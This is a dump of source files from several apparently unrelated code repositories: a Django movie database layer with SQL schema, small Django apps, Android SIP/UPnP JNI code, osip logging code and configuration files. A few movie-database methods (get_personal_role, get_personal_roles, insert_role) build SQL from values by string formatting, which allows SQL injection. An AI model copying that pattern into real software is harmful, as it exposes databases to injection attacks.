role):\n if isinstance(person_pk, tuple):\n person_pk = person_pk[0]\n query = \"\"\"SELECT * FROM personal_role WHERE person='{}' and role='{}';\"\"\".format(person_pk, role)\n self.cursor.execute(query)\n return self.cursor.fetchone()\n\n def get_personal_roles(self, person_pk):\n if isinstance(person_pk, tuple):\n person_pk = person_pk[0]\n query = \"\"\"SELECT * FROM personal_role WHERE person='{}';\"\"\".format(person_pk)\n self.cursor.execute(query)\n return self.cursor.fetchall()\n\n def insert_role(self, person_pk, role):\n if isinstance(person_pk, tuple):\n person_pk = person_pk[0]\n query = \"\"\"INSERT INTO personal_role (\"person\", \"role\") VALUES ('{}', '{}');\"\"\".format(person_pk, role)\n self.cursor.execute(query)\n\n # MOVIES\n def get_movie(self, title, year):\n query = \"\"\"SELECT * FROM movie WHERE title=%s and year=%s;\"\"\"\n self.cursor.execute(query, (title, year))\n return self.cursor.fetchone()\n\n def get_movie_from_pk(self, movie_pk):\n query = \"\"\"SELECT * FROM movie WHERE pk=%s;\"\"\"\n self.cursor.execute(query, (movie_pk,))\n return self.cursor.fetchone()\n\n def get_movies(self, filters, page_number=1, page_size=20):\n limit = page_size\n offset = page_size * (page_number - 1)\n\n conditions = [sql.SQL(\"True\")]\n if \"title\" in filters and len(filters[\"title\"]):\n conditions.append(sql.SQL(\"title ilike {0} \").format(sql.Literal('%' + filters[\"title\"] + '%')))\n if \"company\" in filters and len(filters[\"company\"]):\n conditions.append(sql.SQL(\"company ilike {0} \").format(sql.Literal('%' + filters[\"company\"] + '%')))\n if \"year_gte\" in filters and 
len(filters[\"year_gte\"]):\n            conditions.append(sql.SQL(\"year >= {0} \").format(sql.Literal(filters[\"year_gte\"])))\n        if \"year_lte\" in filters and len(filters[\"year_lte\"]):\n            conditions.append(sql.SQL(\"year <= {0} \").format(sql.Literal(filters[\"year_lte\"])))\n        if \"imdb_rating\" in filters and len(filters[\"imdb_rating\"]):\n            conditions.append(sql.SQL(\"imdb_rating >= {0} \").format(sql.Literal(filters[\"imdb_rating\"])))\n\n        # let's first get the counts\n        query = sql.SQL(\"SELECT count(*) FROM movie WHERE {0};\").format(\n            sql.SQL(\" and \").join(conditions)\n        )\n        self.cursor.execute(query)\n        total_hits = self.cursor.fetchone()[0]\n\n        # now let's get the actual movies in the limit\n        query = sql.SQL(\"SELECT * FROM movie WHERE {0} LIMIT {1} OFFSET {2};\").format(\n            sql.SQL(\" and \").join(conditions), sql.Literal(limit), sql.Literal(offset)\n        )\n        self.cursor.execute(query)\n\n        return {\n            \"values\": self.cursor.fetchall(),\n            \"pagination\": {\n                \"page_number\": page_number,\n                \"page_size\": page_size,\n                \"total_hits\": total_hits,\n                # ceiling division, so an exact multiple of page_size doesn't produce an extra empty page\n                \"total_pages\": (total_hits + page_size - 1) // page_size\n            }\n        }\n\n    def insert_movie(self, title, year, params={}):\n        params[\"title\"] = title\n        params[\"year\"] = year\n\n        query = sql.SQL(\"INSERT INTO movie ({0}) VALUES ({1});\").format(\n            sql.SQL(', ').join([sql.Identifier(value) for value in params.keys()]),\n            sql.SQL(', ').join([sql.Literal(value) for value in params.values()])\n        )\n        self.cursor.execute(query)\n\n    def insert_then_get_movie(self, title, year, params={}):\n        self.insert_movie(title, year, params)\n        return self.get_movie(title, year)\n\n    def update_movie(self, movie_pk, params={}):\n        query = sql.SQL(\"UPDATE movie SET {0} WHERE pk={1};\").format(\n            sql.SQL(', ').join([sql.Identifier(key) + sql.SQL('=') + sql.Literal(params[key]) for key in params]),\n            sql.Literal(movie_pk)\n        )\n        self.cursor.execute(query)\n        self.commit()\n\n    def delete_movie(self, movie_pk):\n        query = sql.SQL(\"DELETE FROM movie WHERE pk={0};\").format(\n            sql.Literal(movie_pk)\n        )\n        self.cursor.execute(query)\n        self.commit()\n\n    # INVOLVEMENTS\n    def get_involvement(self, person_pk, movie_pk, role):\n        if isinstance(person_pk, tuple):\n            person_pk = person_pk[0]\n        if isinstance(movie_pk, tuple):\n            movie_pk = movie_pk[0]\n        query = sql.SQL(\"SELECT * FROM involvement WHERE person={} and movie={} and role={};\").format(\n            sql.Literal(person_pk), sql.Literal(movie_pk), sql.Literal(role)\n        )\n        self.cursor.execute(query)\n        return self.cursor.fetchone()\n\n    def insert_involvement(self, person_pk, movie_pk, role):\n        if isinstance(person_pk, tuple):\n            person_pk = person_pk[0]\n        if isinstance(movie_pk, tuple):\n            movie_pk = movie_pk[0]\n        query = sql.SQL(\"\"\"INSERT INTO involvement (\"person\", \"movie\", \"role\") VALUES ({}, {}, {});\"\"\").format(\n            sql.Literal(person_pk), sql.Literal(movie_pk), sql.Literal(role)\n        )\n        self.cursor.execute(query)\n\n    def get_involvements(self, person_pk):\n        if isinstance(person_pk, tuple):\n            person_pk = person_pk[0]\n        query = sql.SQL(\"\"\"SELECT * FROM movie NATURAL JOIN involvement WHERE involvement.person={};\"\"\").format(\n            sql.Literal(person_pk)\n        )\n        self.cursor.execute(query)\n\n        return self.cursor.fetchall()\n\n    # GENRES\n    def get_genre(self, genre):\n        match = filter(lambda x: x[1] == genre, self.genres)\n        # next() with a default: a filter object is always truthy, so the old\n        # `next(match) if match else None` raised StopIteration on no match\n        return next(match, None)\n\n    # MPAA RATINGS\n    def get_mpaa_rating(self, mpaa_rating):\n        if mpaa_rating in ['N/A', 'NOT RATED', 'Not specified']:\n            mpaa_rating = \"UNRATED\"\n        match = filter(lambda x: x[1] == mpaa_rating, 
self.mpaa_ratings)\n        return next(match, None)\n\n    # COUNTRIES\n    def get_country(self, country):\n        match = filter(lambda x: x[1] == country, self.countries)\n        return next(match, None)\n\n    # LANGUAGES\n    def get_language(self, language):\n        match = filter(lambda x: x[1] == language, self.languages)\n        return next(match, None)\n\n\nclass MockCursor:\n    def execute(self, query):\n        print(\"EXECUTING\", query)\n\n    def fetchone(self):\n        print(\"FETCH-ONE\")\n        return {}\n" }, { "alpha_fraction": 0.694888174533844, "alphanum_fraction": 0.7012779712677002, "avg_line_length": 42.17241287231445, "blob_id": "d775f0761d3a5da15e8479855666825290aa96de", "content_id": "c232691fd91ca5f51fa2289ca2b1c54482f6c5e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1252, "license_type": "no_license", "max_line_length": 89, "num_lines": 29, "path": "/justmovies/urls.py", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "\"\"\"justmovies URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import:  from my_app import views\n    2. Add a URL to urlpatterns:  path('', views.home, name='home')\nClass-based views\n    1. Add an import:  from other_app.views import Home\n    2. Add a URL to urlpatterns:  path('', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.urls import include, path\n    2. Add a URL to urlpatterns:  path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf.urls import url\nfrom justmovies.views import MoviesView, PeopleView, DataView, MovieEditView\nfrom django.views.generic.base import RedirectView\n\nurlpatterns = [\n    path('movies', MoviesView.as_view(), name='movies'),\n    path('people', PeopleView.as_view(), name='people'),\n    path('data', DataView.as_view(), name='data'),\n    path('admin/', admin.site.urls),\n    url(r'^movies/edit/(?P<movie_pk>\\\\d+)/$', MovieEditView.as_view(), name='movie_edit'),\n    url(r'^.*$', RedirectView.as_view(url='/movies', permanent=False), name='home')\n]\n" }, { "alpha_fraction": 0.5203002095222473, "alphanum_fraction": 0.5353121757507324, "avg_line_length": 28.918367385864258, "blob_id": "6d6e39684497b59aea5a642b29e05dbcfd8a20ba", "content_id": "9ca185cfea719d21811e50a39c075daea6dd0217", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 2931, "license_type": "no_license", "max_line_length": 92, "num_lines": 98, "path": "/data/schema.sql", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "-- FIRST DROP EVERYTHING -------------------------------------------\nDO $$ DECLARE\n    record RECORD;\nBEGIN\n    FOR record IN (SELECT tablename FROM pg_tables WHERE schemaname = current_schema()) LOOP\n        EXECUTE 'DROP TABLE IF EXISTS ' || quote_ident(record.tablename) || ' CASCADE';\n    END LOOP;\nEND $$;\n-- DROP TYPES\nDO $$\nBEGIN\n    IF EXISTS (SELECT 1 FROM pg_type WHERE typname = 'role') THEN\n        DROP TYPE role;\n    END IF;\nEND$$;\n\n-- COUNTRY ---------------------------------------------------------\nCREATE TABLE country(\n    pk SERIAL PRIMARY KEY,\n    name VARCHAR(50) UNIQUE NOT NULL\n);\n\n-- RATING ----------------------------------------------------------\nCREATE TABLE rating(\n    pk SERIAL PRIMARY KEY,\n    name VARCHAR(20) UNIQUE NOT NULL\n);\n\n-- LANGUAGE 
--------------------------------------------------------\nCREATE TABLE language(\n    pk SERIAL PRIMARY KEY,\n    name VARCHAR(50) UNIQUE NOT NULL\n);\n\n-- GENRE -----------------------------------------------------------\nCREATE TABLE genre(\n    pk SERIAL PRIMARY KEY,\n    name VARCHAR(50) UNIQUE NOT NULL\n);\n\n-- PERSON ----------------------------------------------------------\nCREATE TABLE person(\n    pk SERIAL PRIMARY KEY,\n    name VARCHAR(200) NOT NULL,\n    dob DATE,\n    image VARCHAR(1000),\n    intro TEXT\n);\n\n-- ROLE ------------------------------------------------------------\nCREATE TYPE ROLE AS ENUM('Actor', 'Director', 'Producer', 'Writer');\n\n-- PERSONAL ROLE ---------------------------------------------------\nCREATE TABLE personal_role(\n    pk SERIAL PRIMARY KEY,\n    role ROLE,\n    person INTEGER REFERENCES person(pk) ON DELETE CASCADE\n);\n\n-- MOVIE -----------------------------------------------------------\nCREATE TABLE movie(\n    pk SERIAL PRIMARY KEY,\n    title VARCHAR(500) NOT NULL,\n    year SMALLINT,\n    company VARCHAR(1000),\n    budget INTEGER,\n    gross VARCHAR(50),\n    released VARCHAR(50),\n    runtime VARCHAR(50),\n    plot TEXT,\n    awards TEXT,\n    poster VARCHAR(1000),\n    website VARCHAR(1000),\n    imdb_rating VARCHAR(10),\n    imdb_id VARCHAR(50),\n    country INTEGER REFERENCES country(pk) ON DELETE CASCADE,\n    rating INTEGER REFERENCES rating(pk) ON DELETE CASCADE,\n    genre INTEGER REFERENCES genre(pk) ON DELETE CASCADE,\n    language INTEGER REFERENCES language(pk) ON DELETE CASCADE\n);\n\n-- INVOLVEMENT -----------------------------------------------------\nCREATE TABLE involvement(\n    pk SERIAL PRIMARY KEY,\n    role ROLE,\n    person INTEGER REFERENCES person(pk) ON DELETE CASCADE,\n    movie INTEGER REFERENCES movie(pk) ON DELETE CASCADE\n);\n\n-- REVIEW ----------------------------------------------------------\nCREATE TABLE review(\n    pk SERIAL PRIMARY KEY,\n    -- user INTEGER REFERENCES user(pk) ON DELETE CASCADE, -- we don't have users yet\n    movie INTEGER REFERENCES movie(pk) ON DELETE CASCADE,\n    text TEXT,\n    rating SMALLINT,\n    constraint rating_range_check check(rating >= 1 and rating <= 10)\n);" } ]
14
ashishchandra-cmd/time_now
https://github.com/ashishchandra-cmd/time_now
7a3762bde15ebd2290710d882b0c7fb191837efb
fe678b80c78a72a9ee07907027e25ebae7651df7
28dccbcbd898fe095e3c9016b704eb6a07a7bdc2
refs/heads/master
2022-07-09T03:37:11.914973
2020-05-16T17:11:37
2020-05-16T17:11:37
264,487,215
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.723247230052948, "alphanum_fraction": 0.7306272983551025, "avg_line_length": 32.875, "blob_id": "89f0430bc00642975d9a357a22c0512dccb6928b", "content_id": "22ad4a4f144f940a69abff9111e5139eb59d7207", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 271, "license_type": "no_license", "max_line_length": 66, "num_lines": 8, "path": "/datetimeproject/testapp/views.py", "repo_name": "ashishchandra-cmd/time_now", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nimport datetime\n# Create your views here.\ndef datetime_views(request):\n time=datetime.datetime.now()\n s='<h1> Hello Current Date and Time is :' +str(time)+ '</h1> '\n return HttpResponse(s)\n" } ]
1
freezmeinster/masjidx
https://github.com/freezmeinster/masjidx
2de6705944183ea2b89a133e62b4651206c0e791
984baf37925288c6b53b8c95740f69e46ed91e0a
bf5314f7dd23688d6674f6fb284b72e58fb42468
refs/heads/master
2020-11-24T22:31:09.289075
2019-12-16T10:53:49
2019-12-16T10:53:49
228,365,936
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7737002968788147, "alphanum_fraction": 0.7737002968788147, "avg_line_length": 20.600000381469727, "blob_id": "1ee7bb50fc241ff2ade0d14e58d6cf09f6dcda8f", "content_id": "1b8ef837c7c13a6293dcf8fd75dcaa75c30e071c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 327, "license_type": "no_license", "max_line_length": 48, "num_lines": 15, "path": "/notulen/admin.py", "repo_name": "freezmeinster/masjidx", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import Notes, Assignment, NotesTask\n\n\nclass AssignmentInline(admin.TabularInline):\n model = Assignment\n\[email protected](Notes)\nclass NotesAdmin(admin.ModelAdmin):\n inlines = [AssignmentInline,]\n\n\[email protected](NotesTask)\nclass NotesTaskAdmin(admin.ModelAdmin):\n pass\n\n\n\n" }, { "alpha_fraction": 0.7647058963775635, "alphanum_fraction": 0.7647058963775635, "avg_line_length": 16, "blob_id": "2dd46491e24b31d377be947c6d6e6493eed0a3dc", "content_id": "bacbd63b2e7f64dfd1e2b01b57a9690e68c8d999", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 34, "license_type": "no_license", "max_line_length": 28, "num_lines": 2, "path": "/Makefile", "repo_name": "freezmeinster/masjidx", "src_encoding": "UTF-8", "text": "run:\n\t@python manage.py runserver\n" }, { "alpha_fraction": 0.6779359579086304, "alphanum_fraction": 0.6886121034622192, "avg_line_length": 27.100000381469727, "blob_id": "798effe86f301a33ea6d9e2a8109ee021261a21c", "content_id": "f7f4630e5af837cb5b1b0f193b5798ed1f861068", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 562, "license_type": "no_license", "max_line_length": 75, "num_lines": 20, "path": "/notulen/models.py", "repo_name": "freezmeinster/masjidx", "src_encoding": "UTF-8", "text": "from django.db import models\n\n\nclass Notes(models.Model):\n title = models.CharField(max_length=255)\n desc = models.TextField()\n\n def __str__(self):\n return self.title\n\nclass NotesTask(models.Model):\n name = models.CharField(max_length=255)\n \n def __str__(self):\n return self.name\n\nclass Assignment(models.Model):\n notes = models.ForeignKey(\"notulen.Notes\", on_delete=models.CASCADE)\n user = models.ForeignKey(\"auth.User\", on_delete=models.CASCADE)\n task = models.ForeignKey(\"notulen.NotesTask\", on_delete=models.CASCADE)\n" }, { "alpha_fraction": 0.7528089880943298, "alphanum_fraction": 0.7528089880943298, "avg_line_length": 16.799999237060547, "blob_id": "cc85e802424ea58305f610e369e6876a7131adf7", "content_id": "0b58e7a4b553c0c088081208ebf4c2730f29c5ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 89, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/notulen/apps.py", "repo_name": "freezmeinster/masjidx", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass NotulenConfig(AppConfig):\n name = 'notulen'\n" } ]
4
fairyhunter13/rxwen-blog-stuff
https://github.com/fairyhunter13/rxwen-blog-stuff
bc8105a3562283e84dc61b0db82c07df4b0a1e28
77fb1b4009e6f0d68737aeaba2c0b9c588546b37
22eaa3480bf8c4c593a074d9cd252440c33d7604
refs/heads/master
2021-05-04T11:43:35.270902
2014-11-07T23:54:04
2020-07-12T10:15:52
48,232,033
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5833333134651184, "alphanum_fraction": 0.5947242379188538, "avg_line_length": 29.88888931274414, "blob_id": "4a0e2b6bad45d531d3bef1f17306741247ee381d", "content_id": "5448e271f4407ccd813879248fda85023b19dc93", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1668, "license_type": "permissive", "max_line_length": 104, "num_lines": 54, "path": "/android/exosip_sample/sip_jni/jni/sip-jni.c", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#include <string.h>\n#include <jni.h>\n\n#include\t<unistd.h>\n#include\t<android/log.h>\n#include\t<netinet/in.h>\n#include <eXosip2/eXosip.h>\n\nconst char* const LOG_TAG = \"SIP_JNI\";\n\nstatic void android_trace_func(char *fi, int li, osip_trace_level_t level, char *chfr, va_list ap)\n{\n __android_log_vprint(ANDROID_LOG_VERBOSE, LOG_TAG, chfr, ap);\n}\n\nvoid Java_com_rmd_sipjni_SipJni_startSipService(JNIEnv* env, jobject thiz )\n{\n //jclass cls = (*env)->FindClass(env, \"com/rmd/sipjni/SipJni\");\n // retrieve cls, mid only once for the sake of performance\n jclass cls = (*env)->GetObjectClass(env, thiz);\n jmethodID mid = (*env)->GetMethodID(env, cls, \"onIncomingCall\", \"(Ljava/lang/String;)Z\");\n jstring js = (*env)->NewStringUTF(env, \"incoming call\");\n int i, port = 5060;\n osip_trace_initialize_func(END_TRACE_LEVEL, &android_trace_func);\n i=eXosip_init();\n if (i!=0)\n return;\n i = eXosip_listen_addr (IPPROTO_UDP, NULL, port, AF_INET, 0);\n if (i!=0)\n {\n eXosip_quit();\n __android_log_print(ANDROID_LOG_ERROR, LOG_TAG, \"%s\", \"could not initialize transport layer\\n\");\n return;\n }\n\n eXosip_event_t *je;\n for (;;)\n {\n je = eXosip_event_wait (0, 24*60*60*1000);\n eXosip_lock();\n eXosip_automatic_action ();\n eXosip_unlock();\n if (je == NULL)\n break;\n if (je->type == EXOSIP_CALL_INVITE)\n {\n __android_log_print(ANDROID_LOG_DEBUG, LOG_TAG, \"%s\", \"incomingCall returns\\n\");\n // call java callback function\n jboolean bl = (*env)->CallBooleanMethod(env, thiz, mid, js);\n }\n }\n\n return;\n}\n" }, { "alpha_fraction": 0.7249881625175476, "alphanum_fraction": 0.7259364724159241, "avg_line_length": 28.29166603088379, "blob_id": "f738d0952a8030ae7464195bec378deb8b9fc684", "content_id": "3b381ea812a3aeeaeb0ebab3eadc6dc858b85760", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 2109, "license_type": "permissive", "max_line_length": 53, "num_lines": 72, "path": "/android/pupnp_jni/jni/Android.mk", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "LOCAL_PATH := $(call my-dir)\n\ninclude $(CLEAR_VARS)\nLOCAL_MODULE := libpupnp\nLOCAL_C_INCLUDES := upnp/inc upnp/src/inc build/inc \\\n\tthreadutil/inc/ ixml/inc/ ixml/src/inc/\n\nLOCAL_LDLIBS := -llog\nLOCAL_CFLAGS := -DDEBUG -g\n\nLOCAL_SRC_FILES := \\\n\tupnp_jni.c \\\n\tupnp/src/ssdp/ssdp_device.c \\\n\tupnp/src/ssdp/ssdp_server.c \\\n\tupnp/src/ssdp/ssdp_ctrlpt.c \\\n\tupnp/src/ssdp/ssdp_ResultData.c \\\n\tupnp/src/genlib/service_table/service_table.c \\\n\tupnp/src/genlib/util/upnp_timeout.c \\\n\tupnp/src/genlib/util/membuffer.c \\\n\tupnp/src/genlib/util/strintmap.c \\\n\tupnp/src/genlib/util/util.c \\\n\tupnp/src/genlib/net/uri/uri.c \\\n\tupnp/src/genlib/net/http/httpreadwrite.c \\\n\tupnp/src/genlib/net/http/statcodes.c \\\n\tupnp/src/genlib/net/http/httpparser.c \\\n\tupnp/src/genlib/net/http/webserver.c \\\n\tupnp/src/genlib/net/http/parsetools.c 
\\\n\tupnp/src/genlib/net/sock.c \\\n\tupnp/src/genlib/miniserver/miniserver.c \\\n\tupnp/src/genlib/client_table/ClientSubscription.c \\\n\tupnp/src/genlib/client_table/client_table.c \\\n\tupnp/src/api/SubscriptionRequest.c \\\n\tupnp/src/api/Discovery.c \\\n\tupnp/src/api/FileInfo.c \\\n\tupnp/src/api/upnptools.c \\\n\tupnp/src/api/ActionRequest.c \\\n\tupnp/src/api/EventSubscribe.c \\\n\tupnp/src/api/UpnpString.c \\\n\tupnp/src/api/ActionComplete.c \\\n\tupnp/src/api/StateVarRequest.c \\\n\tupnp/src/api/StateVarComplete.c \\\n\tupnp/src/api/upnpapi.c \\\n\tupnp/src/api/upnpdebug.c \\\n\tupnp/src/api/Event.c \\\n\tupnp/src/uuid/sysdep.c \\\n\tupnp/src/uuid/uuid.c \\\n\tupnp/src/uuid/md5.c \\\n\tupnp/src/soap/soap_device.c \\\n\tupnp/src/soap/soap_ctrlpt.c \\\n\tupnp/src/soap/soap_common.c \\\n\tupnp/src/win_dll.c \\\n\tupnp/src/inet_pton.c \\\n\tupnp/src/urlconfig/urlconfig.c \\\n\tupnp/src/gena/gena_callback2.c \\\n\tupnp/src/gena/gena_ctrlpt.c \\\n\tupnp/src/gena/gena_device.c \\\n\tthreadutil/src/FreeList.c \\\n\tthreadutil/src/LinkedList.c \\\n\tthreadutil/src/ThreadPool.c \\\n\tthreadutil/src/TimerThread.c \\\n\tixml/src/ixmldebug.c \\\n\tixml/src/node.c \\\n\tixml/src/ixmlmembuf.c \\\n\tixml/src/attr.c \\\n\tixml/src/ixmlparser.c \\\n\tixml/src/element.c \\\n\tixml/src/nodeList.c \\\n\tixml/src/ixml.c \\\n\tixml/src/document.c \\\n\tixml/src/namedNodeMap.c\n\ninclude $(BUILD_SHARED_LIBRARY)\n" }, { "alpha_fraction": 0.682692289352417, "alphanum_fraction": 0.7884615659713745, "avg_line_length": 19.799999237060547, "blob_id": "901d662fbc8a842d54700819c2ee2d03aca020c9", "content_id": "534e48698b7696350d09648b4aaf5f7766036569", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 104, "license_type": "permissive", "max_line_length": 38, "num_lines": 5, "path": "/settings/android_studio_plugins.md", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "http://www.zhihu.com/question/28026027\n\n1. idea vim\n2. butterknife zelezny\n3. parcelable code generator\n" }, { "alpha_fraction": 0.6251298189163208, "alphanum_fraction": 0.6559363007545471, "avg_line_length": 31.829545974731445, "blob_id": "74abd3d9dd9e176692e38a9ef6d88e3e82aa808c", "content_id": "958d43f266a503edc760cc79c4959d9512a5a8a7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2889, "license_type": "permissive", "max_line_length": 151, "num_lines": 88, "path": "/settings/ubuntu_home/.bashrc", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "# ~/.bashrc: executed by bash(1) for non-login shells.\n# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)\n# for examples\n\n# If not running interactively, don't do anything\n[ -z \"$PS1\" ] && return\n\n# don't put duplicate lines in the history. See bash(1) for more options\nexport HISTCONTROL=ignoredups\nexport LANGUAGE=\"en_US.UTF-8\"\n# ... 
and ignore same sucessive entries.\nexport HISTCONTROL=ignoreboth\n\n# check the window size after each command and, if necessary,\n# update the values of LINES and COLUMNS.\nshopt -s checkwinsize\n\n# set -o vi\n\n# make less more friendly for non-text input files, see lesspipe(1)\n[ -x /usr/bin/lesspipe ] && eval \"$(lesspipe)\"\n\n# set variable identifying the chroot you work in (used in the prompt below)\nif [ -z \"$debian_chroot\" ] && [ -r /etc/debian_chroot ]; then\n debian_chroot=$(cat /etc/debian_chroot)\nfi\n\n# set a fancy prompt (non-color, unless we know we \"want\" color)\ncase \"$TERM\" in\nxterm-color)\n #PS1='${debian_chroot:+($debian_chroot)}\\[\\033[01;32m\\]\\u@\\h\\[\\033[00m\\]:\\[\\033[01;34m\\]\\w\\[\\033[00m\\]\\$ '\n PS1='${debian_chroot:+($debian_chroot)}\\[\\033[01;32m\\]\\u@\\h\\[\\033[00m\\]:\\[\\033[01;34m\\][\\W]\\[\\033[00m\\]\\$ '\n ;;\n*)\n # PS1='${debian_chroot:+($debian_chroot)}\\u@\\h:\\w\\$ '\n PS1='${debian_chroot:+($debian_chroot)}\\u@\\h:[\\W]\\$ '\n ;;\nesac\n\n# Comment in the above and uncomment this below for a color prompt\n# PS1='${debian_chroot:+($debian_chroot)}\\[\\033[01;32m\\]\\u@\\h\\[\\033[00m\\]:\\[\\033[01;34m\\][\\W]\\[\\033[00m\\]\\$ '\n\n# If this is an xterm set the title to user@host:dir\ncase \"$TERM\" in\nxterm*|rxvt*)\n PROMPT_COMMAND='echo -ne \"\\033]0;${USER}@${HOSTNAME}: ${PWD/$HOME/~} - Terminal\\007\"'\n ;;\n*)\n ;;\nesac\n\n# Alias definitions.\n# You may want to put all your additions into a separate file like\n# ~/.bash_aliases, instead of adding them here directly.\n# See /usr/share/doc/bash-doc/examples in the bash-doc package.\n\n#if [ -f ~/.bash_aliases ]; then\n# . ~/.bash_aliases\n#fi\n\n# enable color support of ls and also add handy aliases\nif [ \"$TERM\" != \"dumb\" ]; then\n eval \"`dircolors -b`\"\n alias ls='ls --color=auto'\n #alias dir='ls --color=auto --format=vertical'\n #alias vdir='ls --color=auto --format=long'\nfi\n\n# some more ls aliases\n#alias ll='ls -l'\n#alias la='ls -A'\n#alias l='ls -CF'\n\n \n#alias bcscope=\"echo find source files; find ./ -regex '.*\\.\\(cpp\\|c\\|cxx\\|cc\\|h\\|hpp\\|hxx\\)' > cscope.files; echo build cscope; cscope -b; echo done \"\n\nalias mgrep='grep --color=auto -n -H --exclude=*.svn-base --exclude=cscope.* -I -r -E -s '\n# --exclude svn files\n# -I exclude binary files \n# -E support exended regular expression\n# -r recursive searching\n\n# enable programmable completion features (you don't need to enable\n# this, if it's already enabled in /etc/bash.bashrc and /etc/profile\n# sources /etc/bash.bashrc).\nif [ -f /etc/bash_completion ]; then\n . 
/etc/bash_completion\nfi\n" }, { "alpha_fraction": 0.5339038968086243, "alphanum_fraction": 0.5437787771224976, "avg_line_length": 23.901639938354492, "blob_id": "4192231f5b3c264123f85ef9fb4df15a55597b5a", "content_id": "ee6cfb42dc46e653f2e376afb091ccbe9beb7677", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1519, "license_type": "permissive", "max_line_length": 133, "num_lines": 61, "path": "/protocol/osip_logging/osip_log.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#define ENABLE_TRACE\n#include \"osip2/osip.h\"\n#include <stdio.h>\n\nvoid printf_trace_func (char *fi, int li, osip_trace_level_t level, char *chfr, va_list ap)\n{\n const char* desc = \" \";\n switch(level)\n {\n case OSIP_FATAL:\n desc = \" FATAL \";\n break;\n case OSIP_BUG:\n desc = \" BUG \";\n break;\n case OSIP_ERROR:\n desc = \" ERROR \";\n break;\n case OSIP_WARNING:\n desc = \"WARNING\";\n break;\n case OSIP_INFO1:\n desc = \" INFO1 \";\n break;\n case OSIP_INFO2:\n desc = \" INFO2 \";\n break;\n case OSIP_INFO3:\n desc = \" INFO3 \";\n break;\n case OSIP_INFO4:\n desc = \" INFO4 \";\n break;\n default:\n desc = \" \";\n }\n \n printf (\"|%s| <%s: %i> | \", desc, fi, li);\n vprintf(chfr, ap);\n printf (\"\\n\");\n}\n\n\nint main(int argc, _TCHAR* argv[])\n{\n // use plain file as logging storage\n // FILE* f = fopen(\"c:\\\\1.txt\", \"w\");\n // TRACE_INITIALIZE(END_TRACE_LEVEL, f);\n\n // use custom function\n osip_trace_initialize_func(END_TRACE_LEVEL, &printf_trace_func);\n\n // write log message\n OSIP_TRACE (osip_trace(__FILE__, __LINE__, static_cast<osip_trace_level_t>(OSIP_INFO1), NULL, \"osip_trace module initialized!\"));\n \n // trun log message of OSIP_INFO1 level off\n TRACE_DISABLE_LEVEL(OSIP_INFO1);\n \n OSIP_TRACE (osip_trace(__FILE__, __LINE__, static_cast<osip_trace_level_t>(OSIP_INFO1), NULL, \"osip_trace module initialized!\"));\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.6991237998008728, "alphanum_fraction": 0.7796329855918884, "avg_line_length": 17.576051712036133, "blob_id": "27754c0843270d7b5e100720abc37e2423b7f596", "content_id": "460239d900a2d70469b0a3065c614834ad029196", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 6049, "license_type": "permissive", "max_line_length": 78, "num_lines": 309, "path": "/settings/totalcmd/wincmd.ini", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "[Configuration]\r\nInstallDir=d:\\totalcmd\r\nCompareTool=d:\\WinMerge\\WinMergeU.exe\r\nStartupScreen=0\r\nfirstmnu=3578\r\nFirstTime=0\r\ntest=0\r\nMainmenu=\r\nDirTabOptions=1976\r\nDirTabLimit=32\r\nonlyonce=1\r\nTrayIcon=0\r\nUseRightButton=1\r\nSavepath=1\r\nSavepanels=1\r\nMarkDirectories=1\r\nAlwaysToRoot=1\r\nSingleClickStart=0\r\nRenameSelOnlyName=1\r\nSaveCommands=1\r\nSaveHistory=1\r\nCountSpace=1\r\nCountMarked=1\r\n1hourdif=0\r\nCopyComments=6\r\nAligned 